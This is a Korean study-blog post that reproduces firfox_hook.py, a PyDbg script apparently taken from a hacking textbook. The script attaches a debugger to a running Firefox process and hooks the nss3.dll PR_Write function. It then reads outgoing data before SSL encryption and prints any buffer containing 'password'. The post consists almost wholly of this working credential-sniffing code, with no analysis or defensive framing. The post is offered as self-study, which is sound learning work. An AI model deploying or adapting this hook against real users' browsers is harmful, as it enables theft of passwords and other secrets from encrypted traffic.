본문 바로가기

스터디/└ 소스파일들

firfox_hook.py

from pydbg import *
from pydbg.defines import *

import utils
import sys

dbg = pydbg()
found_firefox = False

pattern = "password"

def ssl_sniff(dbg,args):
    buffer = ""
    offset = 0
   
    while 1:
        byte = dbg.read_process_memory(args[1] + offset, 1)
       
        if byte != "\x00":
            buffer += byte
            offset += 1
            continue
        else:
            break
       
    if pattern in buffer:
        print "Pre-Encrypted: %s" % buffer
       
    return DBG_CONTINUE

# find firefox Process

for pid,name in dbg.enumerate_processes():
    if name == "firefox.exe":
        found_firefox = True
        hooks = utils.hook_container()
        dbg.attach(pid)
        print "[+] Attaching to firefox.exe with PID: %d" % pid
       
        # Get address to Hook
        hook_address = dbg.func_resolve_debuggee("nss3.dll","PR_Write")
       
        if hook_address:
            hooks.add(dbg,hook_address,2,ssl_sniff,None)
            print "[+] nspr4.PR_Write hooked at: 0x%08x" % hook_address
           
       
        else:
            print "[+] Error! Couldn't resolve hook address."
            sys.exit(-1)
    if found_firefox:
        print "[+] Hooks set, continuing process."
        dbg.run()
    else:
    #    print "[+] Error! Couldn't find the firefox.exe process."
        continue

'스터디 > └ 소스파일들' 카테고리의 다른 글

ioctl_dump.py  (0) 2015.02.23
ioctl_fuzzer.py  (0) 2015.02.23
hippie_easy.py  (0) 2015.01.26
8시간의 대장정.  (0) 2015.01.26
책 원본 소스파일  (0) 2015.01.20